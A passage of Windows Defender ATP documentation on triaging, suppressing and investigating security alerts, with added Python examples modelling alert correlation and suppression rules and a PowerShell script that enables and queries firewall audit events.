Same file - The files associated with the alert are exactly the same
Same URL - The URL that triggered the alert is exactly the same
You can also manage an alert and see alert metadata along with other information. For more information, see
Investigate alerts.
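The grouping reasons listed above can be illustrated in code. The following is an added example, not code from the Windows Defender ATP documentation or product: it models Same file, Same URL, Proximate time and Manual association over constructed sample alerts, and the field names, the 10-minute window and the placeholder hashes and URL are assumptions of this example.

```python
"""Added example (not part of the Windows Defender ATP documentation): a small
model of how related alerts are grouped into one incident.

Modelled grouping reasons from the page: Same file, Same URL, Proximate time
(same machine within a time window) and Manual association.  Field names,
the 10-minute window and the sample alerts are constructed for illustration.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Optional

# The page says "within a certain timeframe"; 10 minutes is an assumed value.
PROXIMATE_WINDOW = timedelta(minutes=10)


@dataclass
class Alert:
    alert_id: str
    machine: str
    time: datetime
    file_sha1: Optional[str] = None  # placeholder values below, not real hashes
    url: Optional[str] = None


@dataclass
class Incident:
    incident_id: int
    alerts: list[Alert] = field(default_factory=list)
    reasons: dict[str, str] = field(default_factory=dict)  # alert_id -> reason

    def add(self, alert: Alert, reason: str) -> None:
        self.alerts.append(alert)
        self.reasons[alert.alert_id] = reason


def link_reason(new: Alert, existing: Alert) -> Optional[str]:
    """Return the grouping reason linking two alerts, or None if unrelated.

    An exact file match is preferred over a URL match, which is preferred
    over mere proximity in time on the same machine (assumed precedence).
    """
    if new.file_sha1 and new.file_sha1 == existing.file_sha1:
        return "Same file"
    if new.url and new.url == existing.url:
        return "Same URL"
    if new.machine == existing.machine and abs(new.time - existing.time) <= PROXIMATE_WINDOW:
        return "Proximate time"
    return None


def correlate(alerts: list[Alert]) -> list[Incident]:
    """Fold alerts, oldest first, into incidents; the first matching incident wins."""
    incidents: list[Incident] = []
    for alert in sorted(alerts, key=lambda a: a.time):
        for incident in incidents:
            reason = next(
                (r for r in (link_reason(alert, e) for e in incident.alerts) if r), None
            )
            if reason:
                incident.add(alert, reason)
                break
        else:
            incident = Incident(incident_id=len(incidents) + 1)
            incident.add(alert, "Original alert")
            incidents.append(incident)
    return incidents


def link_manually(incidents: list[Incident], keep_id: int, merge_id: int) -> list[Incident]:
    """Manual association: an analyst merges one incident into another."""
    keep = next(i for i in incidents if i.incident_id == keep_id)
    merge = next(i for i in incidents if i.incident_id == merge_id)
    for alert in merge.alerts:
        keep.add(alert, "Manual association")
    return [i for i in incidents if i.incident_id != merge_id]


def sample_alerts() -> list[Alert]:
    """Constructed sample data: hashes and the URL are placeholders, not real IoCs."""
    t0 = datetime(2019, 4, 5, 9, 0)
    return [
        Alert("A1", "WS01", t0, file_sha1="SAMPLE-HASH-1"),
        Alert("A3", "WS01", t0 + timedelta(minutes=5), url="http://sample.invalid/x"),
        Alert("A2", "WS02", t0 + timedelta(hours=3), file_sha1="SAMPLE-HASH-1"),
        Alert("A4", "WS03", t0 + timedelta(hours=6), url="http://sample.invalid/x"),
        Alert("A5", "WS04", t0 + timedelta(hours=7), file_sha1="SAMPLE-HASH-2"),
    ]


if __name__ == "__main__":
    for inc in correlate(sample_alerts()):
        print(f"Incident {inc.incident_id}:")
        for a in inc.alerts:
            print(f"  {a.alert_id} on {a.machine}: {inc.reasons[a.alert_id]}")
```

With the sample data, A1, A3, A2 and A4 end up in one incident (by proximate time, same file and same URL respectively) while A5 starts a second incident.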
Machines
You can also investigate the machines that are part of, or related to, a given incident. For more information, see
Investigate machines.

Investigations
Select Investigations to see all the automatic investigations launched by the system in response to the incident
alerts.

Going through the evidence


Windows Defender Advanced Threat Protection automatically investigates all the incidents' supported events and
suspicious entities in the alerts, providing you with auto-response and information about the important files,
processes, services, and more. This helps quickly detect and block potential threats in the incident. Each of the
analyzed entities will be marked as infected, remediated, or suspicious.

Visualizing associated cybersecurity threats


Windows Defender Advanced Threat Protection aggregates the threat information into an incident so you can see
the patterns and correlations coming in from various data points. You can view such correlation through the
incident graph.
Incident graph
The Graph tells the story of the cybersecurity attack. For example, it shows you the entry point, and which
indicator of compromise or activity was observed on which machine.
You can click the circles on the incident graph to view the details of the malicious files, the associated file
detections, how many instances have been seen worldwide, whether the file has been observed in your organization
and, if so, in how many instances.

Related topics
Incidents queue
View and organize the Incidents queue
Manage incidents
View and organize the Windows Defender Advanced Threat Protection Alerts queue
4/5/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

The Alerts queue shows a list of alerts that were flagged from machines in your network. By default, the
queue displays alerts seen in the last 30 days in a grouped view, with the most recent alerts showing at the top
of the list, helping you see the most recent alerts first.
There are several options you can choose from to customize the alerts queue view.
On the top navigation you can:
Select grouped view or list view
Customize columns to add or remove columns
Select the items to show per page
Navigate between pages
Apply filters

Sort, filter, and group the alerts queue


You can apply the following filters to limit the list of alerts and get a more focused view of the alerts.
Severity
ALERT SEVERITY: DESCRIPTION

High (Red): Threats often associated with advanced persistent threats (APT). These alerts indicate a high risk due
to the severity of damage they can inflict on machines.

Medium (Orange): Threats rarely observed in the organization, such as anomalous registry change, execution of
suspicious files, and observed behaviors typical of attack stages.

Low (Yellow): Threats associated with prevalent malware and hack-tools that do not necessarily indicate an
advanced threat targeting the organization.

Informational (Grey): Informational alerts are those that might not be considered harmful to the network but
might be good to keep track of.

Understanding alert severity


It is important to understand that the Windows Defender Antivirus (Windows Defender AV) and Windows
Defender ATP alert severities are different because they represent different scopes.
The Windows Defender AV threat severity represents the absolute severity of the detected threat (malware),
and is assigned based on the potential risk to the individual machine, if infected.
The Windows Defender ATP alert severity represents the severity of the detected behavior, the actual risk to
the machine and, more importantly, the potential risk to the organization.
So, for example:
The severity of a Windows Defender ATP alert about a Windows Defender AV detected threat that was
completely prevented and did not infect the machine is categorized as "Informational" because there was
no actual damage incurred.
An alert about commercial malware that was detected while executing, but blocked and remediated by
Windows Defender AV, is categorized as "Low" because it may have caused some damage to the individual
machine but poses no organizational threat.
An alert about malware detected while executing which can pose a threat not only to the individual
machine but to the organization, regardless of whether it was eventually blocked, may be ranked as "Medium" or
"High".
Suspicious behavioral alerts which were not blocked or remediated will be ranked "Low", "Medium" or
"High" following the same organizational threat considerations.
Status
You can choose to limit the list of alerts based on their status.
Investigation state
Corresponds to the automated investigation state.
Assigned to
You can choose between showing alerts that are assigned to you or automation.
Detection source
Select the source that triggered the alert detection. Microsoft Threat Experts preview participants can now
filter and see detections from the new threat experts managed hunting service.

NOTE
The Windows Defender Antivirus filter will only appear if machines are using Windows Defender Antivirus as the default
real-time protection antimalware product.

OS platform
Limit the alerts queue view by selecting the OS platform that you're interested in investigating.
Machine group
If you have specific machine groups that you're interested in checking the alerts on, you can select the groups
to limit the alerts queue view to display just those machine groups.
Associated threat
Use this filter to focus on alerts that are related to high profile threats. You can see the full list of high-profile
threats in Threat analytics.

Related topics
Manage Windows Defender Advanced Threat Protection alerts
Investigate Windows Defender Advanced Threat Protection alerts
Investigate a file associated with a Windows Defender ATP alert
Investigate machines in the Windows Defender ATP Machines list
Investigate an IP address associated with a Windows Defender ATP alert
Investigate a domain associated with a Windows Defender ATP alert
Investigate a user account in Windows Defender ATP
Manage Windows Defender Advanced Threat Protection alerts
4/30/2019 • 4 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Windows Defender ATP notifies you of possible malicious events, attributes, and contextual information through
alerts. A summary of new alerts is displayed in the Security operations dashboard, and you can access all
alerts in the Alerts queue.
You can manage alerts by selecting an alert in the Alerts queue or the Alerts related to this machine section
of the machine details view.
Selecting an alert in either of those places brings up the Alert management pane.

Link to another incident


You can create a new incident from the alert or link to an existing incident.

Assign alerts
If an alert is not yet assigned, you can select Assign to me to assign the alert to yourself.

Suppress alerts
There might be scenarios where you need to suppress alerts from appearing in Windows Defender Security
Center. Windows Defender ATP lets you create suppression rules for specific alerts that are known to be
innocuous such as known tools or processes in your organization.
Suppression rules can be created from an existing alert. They can be disabled and re-enabled if needed.
When a suppression rule is created, it will take effect from the point when the rule is created. The rule will not
affect existing alerts already in the queue prior to the rule creation. The rule will only be applied on alerts that
satisfy the conditions set after the rule is created.
There are two contexts for a suppression rule that you can choose from:
Suppress alert on this machine
Suppress alert in my organization
The context of the rule lets you tailor what gets surfaced into the portal and ensure that only real security alerts
are surfaced into the portal.
You can use the examples in the following table to help you choose the context for a suppression rule:

CONTEXT: Suppress alert on this machine
DEFINITION: Alerts with the same alert title and on that specific machine only will be suppressed. All other alerts
on that machine will not be suppressed.
EXAMPLE SCENARIOS: A security researcher is investigating a malicious script that has been used to attack other
machines in your organization. A developer regularly creates PowerShell scripts for their team.

CONTEXT: Suppress alert in my organization
DEFINITION: Alerts with the same alert title on any machine will be suppressed.
EXAMPLE SCENARIOS: A benign administrative tool is used by everyone in your organization.

Suppress an alert and create a new suppression rule:


Create custom rules to control when alerts are suppressed, or resolved. You can control the context for when an
alert is suppressed by specifying the alert title, Indicator of compromise, and the conditions. After specifying the
context, you’ll be able to configure the action and scope on the alert.
1. Select the alert you'd like to suppress. This brings up the Alert management pane.
2. Select Create a suppression rule.
You can create a suppression rule based on the following attributes:
File hash
File name - wild card supported
File path - wild card supported
IP
URL - wild card supported
3. Select the Triggering IOC.
4. Specify the action and scope on the alert.
You can automatically resolve an alert or hide it from the portal. Alerts that are automatically resolved will
appear in the resolved section of the alerts queue. Alerts that are marked as hidden will be suppressed
from the entire system, both on the machine's associated alerts and from the dashboard. You can also
specify to suppress the alert on a specific machine group.
5. Enter a rule name and a comment.
6. Click Save.
View the list of suppression rules
1. In the navigation pane, select Settings > Alert suppression.
2. The list of suppression rules shows all the rules that users in your organization have created.
For more information on managing suppression rules, see Manage suppression rules.
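The rule semantics described in this section (same alert title, one triggering IOC with wildcards for file name, file path and URL, machine or organization context, optional machine-group scope, resolve or hide action, and no effect on alerts raised before the rule existed) can be modelled as follows. This is an added example, not code from the Windows Defender ATP documentation or product; the field names, the case-insensitive fnmatch-style matching and all sample machine names, groups and paths are assumptions of the example.

```python
"""Added example (not part of the Windows Defender ATP documentation): a model
of how a suppression rule is matched against alerts, following the page's
description.  Field names, matching details (case-insensitive comparison,
fnmatch-style wildcards) and all sample data are constructed here.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta
from fnmatch import fnmatchcase
from typing import Optional

WILDCARD_TYPES = {"file_name", "file_path", "url"}  # wildcard-capable per the page


@dataclass
class Alert:
    title: str
    machine: str
    machine_group: str
    time: datetime
    ioc: dict[str, str]  # e.g. {"file_path": "C:\\Tools\\scan.ps1"} (constructed)


@dataclass
class SuppressionRule:
    title: str
    context: str                    # "machine" or "organization"
    ioc_type: str                   # file_hash, file_name, file_path, ip, url
    ioc_value: str                  # wildcards allowed for file_name/file_path/url
    action: str                     # "resolve" or "hide"
    created: datetime
    machine: Optional[str] = None   # required when context == "machine"
    machine_groups: Optional[frozenset[str]] = None  # optional scope narrowing


def ioc_matches(rule: SuppressionRule, alert: Alert) -> bool:
    """Compare the rule's triggering IOC with the alert's (assumed case-insensitive)."""
    value = alert.ioc.get(rule.ioc_type)
    if value is None:
        return False
    if rule.ioc_type in WILDCARD_TYPES:
        return fnmatchcase(value.lower(), rule.ioc_value.lower())
    return value.lower() == rule.ioc_value.lower()


def rule_applies(rule: SuppressionRule, alert: Alert) -> bool:
    if alert.time < rule.created:
        return False        # alerts already in the queue are not affected
    if alert.title != rule.title:
        return False        # only alerts with the same alert title
    if rule.context == "machine" and alert.machine != rule.machine:
        return False        # "Suppress alert on this machine" context
    if rule.machine_groups is not None and alert.machine_group not in rule.machine_groups:
        return False        # optional machine-group scope
    return ioc_matches(rule, alert)


def triage(alerts: list[Alert], rules: list[SuppressionRule]) -> dict[str, list[str]]:
    """Route each alert to the queue the page describes: new, resolved or hidden."""
    queues: dict[str, list[str]] = {"new": [], "resolved": [], "hidden": []}
    for alert in alerts:
        rule = next((r for r in rules if rule_applies(r, alert)), None)
        label = f"{alert.title} @ {alert.machine}"
        if rule is None:
            queues["new"].append(label)
        elif rule.action == "resolve":
            queues["resolved"].append(label)  # still visible under Resolved
        else:
            queues["hidden"].append(label)    # suppressed from the whole portal
    return queues


def sample_run() -> dict[str, list[str]]:
    """Constructed scenario: a developer's own scripts on one machine, and an
    admin tool used organization-wide.  Names, groups and paths are placeholders."""
    created = datetime(2019, 4, 5, 12, 0)
    rules = [
        SuppressionRule("Suspicious PowerShell script", "machine", "file_path",
                        "C:\\Users\\dev1\\Scripts\\*.ps1", "hide", created,
                        machine="DEV-PC-01"),
        SuppressionRule("Admin tool execution", "organization", "file_name",
                        "admintool.exe", "resolve", created,
                        machine_groups=frozenset({"Servers", "Workstations"})),
    ]
    alerts = [
        # raised before the rule existed: stays in the queue
        Alert("Suspicious PowerShell script", "DEV-PC-01", "Workstations",
              created - timedelta(hours=1), {"file_path": "C:\\Users\\dev1\\Scripts\\a.ps1"}),
        # same title, same machine, path matches the wildcard: hidden
        Alert("Suspicious PowerShell script", "DEV-PC-01", "Workstations",
              created + timedelta(hours=1), {"file_path": "C:\\Users\\dev1\\Scripts\\b.ps1"}),
        # same title and path pattern but another machine: outside the rule's context
        Alert("Suspicious PowerShell script", "WS-07", "Workstations",
              created + timedelta(hours=2), {"file_path": "C:\\Users\\dev1\\Scripts\\c.ps1"}),
        # organization-wide rule, machine group in scope: auto-resolved
        Alert("Admin tool execution", "SRV-02", "Servers",
              created + timedelta(hours=3), {"file_name": "AdminTool.exe"}),
        # matching file name but a group outside the rule's scope: stays new
        Alert("Admin tool execution", "DC-01", "Domain Controllers",
              created + timedelta(hours=4), {"file_name": "AdminTool.exe"}),
    ]
    return triage(alerts, rules)
```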

Change the status of an alert


You can categorize alerts (as New, In Progress, or Resolved) by changing their status as your investigation
progresses. This helps you organize and manage how your team can respond to alerts.
For example, a team leader can review all New alerts, and decide to assign them to the In Progress queue for
further analysis.
Alternatively, the team leader might assign the alert to the Resolved queue if they know the alert is benign,
coming from a machine that is irrelevant (such as one belonging to a security administrator), or is being dealt
with through an earlier alert.

Alert classification
You can choose not to set a classification, or specify whether an alert is a true alert or a false alert. It's important
to provide the classification of true positive/false positive. This classification is used to monitor alert quality, and
make alerts more accurate. The "determination" field defines additional fidelity for a "true positive" classification.

Add comments and view the history of an alert


You can add comments and view historical events about an alert to see previous changes made to the alert.
Whenever a change or comment is made to an alert, it is recorded in the Comments and history section.
Added comments instantly appear on the pane.

Related topics
Manage suppression rules
View and organize the Windows Defender Advanced Threat Protection Alerts queue
Investigate Windows Defender Advanced Threat Protection alerts
Investigate a file associated with a Windows Defender ATP alert
Investigate machines in the Windows Defender ATP Machines list
Investigate an IP address associated with a Windows Defender ATP alert
Investigate a domain associated with a Windows Defender ATP alert
Investigate a user account in Windows Defender ATP
Investigate Windows Defender Advanced Threat Protection alerts
4/5/2019 • 4 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Investigate alerts that are affecting your network, understand what they mean, and how to resolve them.
Click an alert to see the alert details view and the various tiles that provide information about the alert.
You can also manage an alert and see alert metadata along with other information that can help you make
better decisions on how to approach them. You'll also see a status of the automated investigation on the upper
right corner. Clicking on the link will take you to the Automated investigations view. For more information, see
Automated investigations.

The alert context tile shows the where, who, and when context of the alert. As with other pages, you can click
on the icon beside the name or user account to bring up the machine or user details pane. The alert details
view also has a status tile that shows the status of the alert in the queue. You'll also see a description and a set
of recommended actions which you can expand.
For more information about managing alerts, see Manage alerts.
The alert details page also shows the alert process tree, an incident graph, and an artifact timeline.
You can click on the machine link from the alert view to navigate to the machine. The alert will be highlighted
automatically, and the timeline will display the appearance of the alert and its evidence in the Machine
timeline. If the alert appeared more than once on the machine, the latest occurrence will be displayed in the
Machine timeline.
Alerts attributed to an adversary or actor display a colored tile with the actor's name.

Click on the actor's name to see the threat intelligence profile of the actor, including a brief overview of the
actor, their interests or targets, their tools, tactics, and processes (TTPs) and areas where they've been observed
worldwide. You will also see a set of recommended actions to take.
Some actor profiles include a link to download a more comprehensive threat intelligence report.

The detailed alert profile helps you understand who the attackers are, who they target, what techniques, tools,
and procedures (TTPs) they use, which geolocations they are active in, and finally, what recommended actions
you may take. In many cases, you can download a more detailed Threat Intelligence report about this attacker
or campaign for offline reading.

Alert process tree


The Alert process tree takes alert triage and investigation to the next level, displaying the aggregated alert
and surrounding evidence that occurred within the same execution context and time period. This rich triage and
investigation context is available on the alert page.
The Alert process tree expands to display the execution path of the alert and related evidence that occurred
around the same period. Items marked with a thunderbolt icon should be given priority during investigation.

NOTE
The alert process tree might not be available in some alerts.

Clicking the circle immediately to the left of the indicator displays its details.
The alert details pane helps you take a deeper look at the details about the alert. It displays rich information
about the execution details, file details, detections, observed worldwide, observed in organization, and other
details taken from the entity's page – while remaining on the alert page, so you never leave the current context
of your investigation.

Incident graph
The Incident Graph provides a visual representation of the organizational footprint of the alert and its
evidence: where the evidence that triggered the alert was observed on other machines. It provides a graphical
mapping from the original machine and evidence expanding to show other machines in the organization where
the triggering evidence was also observed.
The Incident Graph supports expansion by File, Process, command line, or Destination IP Address, as
appropriate.
The Incident Graph expansion by destination IP Address shows the organizational footprint of
communications with this IP Address without having to change context by navigating to the IP Address page.
You can click the full circles on the incident graph to expand the nodes and view the expansion to other
machines where the matching criteria were observed.

Artifact timeline
The Artifact timeline feature provides an additional view of the evidence that triggered the alert on the
machine, and shows the date and time the evidence triggering the alert was observed, as well as the first time it
was observed on the machine. This can help in understanding whether the evidence was first observed at the time of
the alert, or whether it was observed on the machine earlier, without triggering an alert.
Selecting an alert detail brings up the Details pane where you'll be able to see more information about the
alert such as file details, detections, instances of it observed worldwide, and in the organization.

Related topics
View and organize the Windows Defender Advanced Threat Protection Alerts queue
Manage Windows Defender Advanced Threat Protection alerts
Investigate a file associated with a Windows Defender ATP alert
Investigate machines in the Windows Defender ATP Machines list
Investigate an IP address associated with a Windows Defender ATP alert
Investigate a domain associated with a Windows Defender ATP alert
Investigate a user account in Windows Defender ATP
Investigate a file associated with a Windows Defender ATP alert
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Investigate the details of a file associated with a specific alert, behavior, or event to help determine if the file
exhibits malicious activities, identify the attack motivation, and understand the potential scope of the breach.
You can investigate files by using the search feature, clicking on a link from the Alert process tree, Incident
graph, Artifact timeline, or from an event listed in the Machine timeline.
You can get information from the following sections in the file view:
File details, Malware detection, Prevalence worldwide
Deep analysis
Alerts related to this file
File in organization
Most recent observed machines with file

File worldwide and Deep analysis


The file details, malware detection, and prevalence worldwide sections display various attributes about the file.
You’ll see actions you can take on the file. For more information on how to take action on a file, see Take
response action on a file.
You'll see details such as the file’s MD5, the VirusTotal detection ratio and Windows Defender AV detection if
available, and the file’s prevalence worldwide. You'll also be able to submit a file for deep analysis.

Alerts related to this file


The Alerts related to this file section provides a list of alerts that are associated with the file. This list is a
simplified version of the Alerts queue, and shows the date when the last activity was detected, a short description
of the alert, the user associated with the alert, the alert's severity, the alert's status in the queue, and who is
addressing the alert.
File in organization
The File in organization section provides details on the prevalence of the file, prevalence in email inboxes and
the name observed in the organization.

Most recent observed machines with the file


The Most recent observed machines with the file section allows you to specify a date range to see which
machines have been observed with the file.

This allows for greater accuracy in defining entities to display such as if and when an entity was observed in the
organization. For example, if you’re trying to identify the origin of a network communication to a certain IP
Address within a 10-minute period on a given date, you can specify that exact time interval, and see only files
that communicated with that IP Address at that time, drastically reducing unnecessary scrolling and searching.

Related topics
View and organize the Windows Defender Advanced Threat Protection Alerts queue
Manage Windows Defender Advanced Threat Protection alerts
Investigate Windows Defender Advanced Threat Protection alerts
Investigate machines in the Windows Defender ATP Machines list
Investigate an IP address associated with a Windows Defender ATP alert
Investigate a domain associated with a Windows Defender ATP alert
Investigate a user account in Windows Defender ATP
Investigate machines in the Windows Defender ATP Machines list
4/5/2019 • 7 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Investigate machines
Investigate the details of an alert raised on a specific machine to identify other behaviors or events that might be
related to the alert or the potential scope of breach.
You can click on affected machines whenever you see them in the portal to open a detailed report about that
machine. Affected machines are identified in the following areas:
The Machines list
The Alerts queue
The Security operations dashboard
Any individual alert
Any individual file details view
Any IP address or domain details view
When you investigate a specific machine, you'll see:
Machine details, Logged on users, Machine risk, and Machine Reporting
Alerts related to this machine
Machine timeline

The machine details, logged on users, machine risk, and machine reporting sections display various attributes
about the machine.
Machine details
The machine details tile provides information such as the domain and OS of the machine. If there's an investigation
package available on the machine, you'll see a link that allows you to download the package.
For more information on how to take action on a machine, see Take response action on a machine.
Logged on users
Clicking on the logged on users in the Logged on users tile opens the Users Details pane that displays the following
information for logged on users in the past 30 days:
Interactive and remote interactive logins
Network, batch, and system logins

You'll also see details such as logon types for each user account, the user group, and when the account logon
occurred.
For more information, see Investigate user entities.
Machine risk
The Machine risk tile shows the overall risk assessment of a machine. A machine's risk level can be determined
using the number of active alerts or by a combination of multiple risks that may increase the risk assessment and
their severity levels. You can influence a machine's risk level by resolving associated alerts manually or
automatically and also by suppressing an alert. The risk level is also an indicator of the active threats that machines
could be exposed to.
Azure Advanced Threat Protection
If you have enabled the Azure ATP feature and there are alerts related to the machine, you can click on the link that
will take you to the Azure ATP page, where more information about the alerts is provided.

NOTE
You'll need to enable the integration on both Azure ATP and Windows Defender ATP to use this feature. In Windows Defender
ATP, you can enable this feature in advanced features. For more information on how to enable advanced features, see Turn on
advanced features.

Machine reporting
The Machine reporting tile provides the last internal and external IP addresses of the machine. It also shows when
the machine was first and last seen reporting to the service.

Alerts related to this machine


The Alerts related to this machine section provides a list of alerts that are associated with the machine. You can
also manage alerts from this section by clicking the circle icons to the left of the alert (or using Ctrl or Shift + click
to select multiple alerts).
This list is a filtered version of the Alerts queue, and shows the date when the alert's last activity was detected, a
short description of the alert, the user account associated with the alert, the alert's severity, the alert's status in the
queue, and who is addressing the alert.
You can also choose to highlight an alert from the Alerts related to this machine or from the Machine timeline
section to see the correlation between the alert and its related events on the machine by right-clicking on the alert
and selecting Select and mark events. This highlights the alert and its related events and helps distinguish them
from other alerts and events appearing in the timeline. Highlighted events are displayed in all information levels
whether you choose to view the timeline by Detections, Behaviors, or Verbose.

Machine timeline
The Machine timeline section provides a chronological view of the events and associated alerts that have been
observed on the machine.
This feature also enables you to selectively drill down into events that occurred within a given time period. You can
view the temporal sequence of events that occurred on a machine over a selected time period.

Windows Defender ATP monitors and captures suspicious or anomalous behavior on Windows 10 machines and
displays the process tree flow in the Machine timeline. This gives you better context for the behavior, which helps
you understand the correlation between events, files, and IP addresses in relation to the machine.
Search for specific events
Use the search bar to look for specific timeline events. The following search queries, based on type:value pairs and
event filter types, let you narrow the search results:
Value - Type in any search keyword to filter the timeline with the attribute you’re searching for. This search
supports defined search queries based on type:value pairs.
You can use any of the following values:
Hash: SHA1 or MD5
File name
File extension
Path
Command line
User
IP
URL
Informational level – Click the drop-down button to filter by the following levels:
Detections mode: displays Windows Defender ATP alerts and detections
Behaviors mode: displays "detections" and selected events of interest
Verbose mode: displays all raw events without aggregation or filtering
Event type - Click the drop-down button to filter by event types such as Windows Defender ATP alerts,
Windows Defender Application Guard events, registry events, file events, and others.
Filtering by event type allows you to define precise queries so that you see events with a specific focus. For
example, you can search for a file name, then filter the results to only see Process events matching the search
criteria or to only view file events, or even better: to view only network events over a period of time to make
sure no suspicious outbound communications go unnoticed.

NOTE
For firewall events to be displayed, you'll need to enable the audit policy, see Audit Filtering Platform connection. Firewall
covers the following events:
5025 - firewall service stopped
5031 - application blocked from accepting incoming connections on the network
5157 - blocked connection

User account – Click the drop-down button to filter the machine timeline by the following user associated
events:
Logon users
System
Network
Local service
The following example illustrates the use of a type:value pair. The events were filtered by searching for the user
jonathan.wolcott and selecting network events as the event type:

The results in the timeline only show network communication events run in the defined user context.
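The firewall note above says that firewall events reach the timeline only once the Audit Filtering Platform Connection policy is enabled on the endpoint. The following PowerShell, added here as an example and not part of the original documentation, checks and enables that audit subcategory and then queries the local Security log for the three event IDs the note lists (5025, 5031, 5157), so you can confirm on the endpoint itself that the events are being generated before expecting them in the portal. It assumes an elevated PowerShell session and the default Security log; the 24-hour window is an arbitrary choice.

```powershell
# Added example (not from the original documentation): verify and enable the
# audit subcategory that produces the firewall events listed in the note,
# then confirm those events are actually being written on this endpoint.
# Requires an elevated (Administrator) PowerShell session.

# 1. Show the current audit setting for the subcategory the note refers to.
auditpol /get /subcategory:"Filtering Platform Connection"

# 2. Enable success and failure auditing. Event 5157 (blocked connection)
#    is a failure audit, so failure auditing must be on for it to appear.
auditpol /set /subcategory:"Filtering Platform Connection" /success:enable /failure:enable

# 3. Query the Security log for the three event IDs the note lists,
#    limited to the last 24 hours (window chosen for this example).
$filter = @{
    LogName   = 'Security'
    Id        = 5025, 5031, 5157
    StartTime = (Get-Date).AddHours(-24)
}
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

if (-not $events) {
    Write-Host "No firewall audit events (5025/5031/5157) found in the last 24 hours."
} else {
    # Count per event ID so you can see which of the three are firing.
    $events | Group-Object Id |
        Select-Object @{ n = 'EventId'; e = { $_.Name } }, Count |
        Sort-Object EventId |
        Format-Table -AutoSize

    # Show the most recent blocked connections (5157) with the fields an
    # analyst wants first: time, process, direction, destination, protocol.
    # Direction is stored as a resource code (%%14592 inbound, %%14593 outbound).
    $events | Where-Object Id -eq 5157 | Select-Object -First 10 | ForEach-Object {
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
        [pscustomobject]@{
            Time        = $_.TimeCreated
            Application = $data['Application']
            Direction   = $data['Direction']
            Destination = "$($data['DestAddress']):$($data['DestPort'])"
            Protocol    = $data['Protocol']
        }
    } | Format-Table -AutoSize
}
```

If step 3 returns nothing after the policy is enabled, the endpoint is not producing the events and the gap is local audit configuration rather than the portal; if the events are present locally but absent from the timeline, check sensor health for the machine instead.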
Filter events from a specific date
Use the time-based slider to filter events from a specific date. By default, the machine timeline is set to display the
events of the current day.
Using the slider updates the listed alerts to the date that you select. Displayed events are filtered from that date and
older.
The slider is helpful when you're investigating a particular alert on a machine. You can navigate from the Alerts
view and click on the machine associated with the alert to jump to the specific date when the alert was observed,
enabling you to investigate the events that took place around the alert.
Export machine timeline events
You can also export detailed event data from the machine timeline to conduct offline analysis. You can choose to
export the machine timeline for the current date or specify a date range. You can export up to seven days of data
and specify the start and end times within those dates.

Navigate between pages


Use the events per page drop-down to choose the number of events you'd like to see on the page. You can choose to
display 20, 50, or 100 events per page. You can also move between pages by clicking Older or Newer.
From the Machines list, you can also navigate to the file, IP, or URL view. The timeline associated with an alert is
retained, helping you view the investigation from different angles without losing the context of the event timeline.
From the list of events displayed in the timeline, you can examine the behaviors or events to help identify
indicators of interest such as files and IP addresses and determine the scope of a breach. You can then use that
information to respond to events and keep your systems secure.

You can also use the Artifact timeline feature to see the correlation between alerts and events on a specific machine.
Expand an event to view associated processes related to the event. Click on the circle next to any process or IP
address in the process tree to investigate additional details of the identified processes. This action brings up the
Details pane, which includes the execution context of processes, network communications, and a summary of
metadata on the file or IP address.
The details pane enriches the ‘in-context’ information across investigation and exploration activities, reducing the
need to switch between contexts. It lets you focus on the task of tracing associations between attributes without
leaving the current context.

Related topics
View and organize the Windows Defender Advanced Threat Protection Alerts queue
Manage Windows Defender Advanced Threat Protection alerts
Investigate Windows Defender Advanced Threat Protection alerts
Investigate a file associated with a Windows Defender ATP alert
Investigate an IP address associated with a Windows Defender ATP alert
Investigate a domain associated with a Windows Defender ATP alert
Investigate a user account in Windows Defender ATP
Investigate an IP address associated with a Windows Defender ATP alert
4/5/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Examine possible communication between your machines and external internet protocol (IP) addresses.
Identifying all machines in the organization that communicated with a suspected or known malicious IP address,
such as Command and Control (C2) servers, helps determine the potential scope of breach, associated files, and
infected machines.
You can find information from the following sections in the IP address view:
IP worldwide, Reverse DNS names
Alerts related to this IP
IP in organization
Most recent observed machines with IP

IP Worldwide and Reverse DNS names


The IP address details section shows attributes of the IP address such as its ASN and its Reverse DNS names.

Alerts related to this IP


The Alerts related to this IP section provides a list of alerts that are associated with the IP.

IP in organization
The IP in organization section provides details on the prevalence of the IP address in the organization.

Most recent observed machines with IP


The Most recent observed machines with IP section provides a chronological view of the events and
associated alerts that were observed for the IP address.
Investigate an external IP:
1. Select IP from the Search bar drop-down menu.
2. Enter the IP address in the Search field.
3. Click the search icon or press Enter.
Details about the IP address are displayed, including: registration details (if available), reverse IPs (for example,
domains), the prevalence of machines in the organization that communicated with this IP address (during a
selectable time period), and the machines in the organization that were observed communicating with this IP address.
NOTE
Search results will only be returned for IP addresses observed in communication with machines in the organization.

Use the search filters to define the search criteria. You can also use the timeline search box to filter the displayed
results of all machines in the organization observed communicating with the IP address, the file associated with
the communication and the last date observed.
Clicking any of the machine names will take you to that machine's view, where you can continue investigating
reported alerts, behaviors, and events.

Related topics
View and organize the Windows Defender Advanced Threat Protection Alerts queue
Manage Windows Defender Advanced Threat Protection alerts
Investigate Windows Defender Advanced Threat Protection alerts
Investigate a file associated with a Windows Defender ATP alert
Investigate machines in the Windows Defender ATP Machines list
Investigate a domain associated with a Windows Defender ATP alert
Investigate a user account in Windows Defender ATP
Investigate a domain associated with a Windows Defender ATP alert
4/5/2019 • 2 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Investigate a domain to see if machines and servers in your enterprise network have been communicating with a
known malicious domain.
You can investigate a domain by using the search feature or by clicking on a domain link from the Machine
timeline.
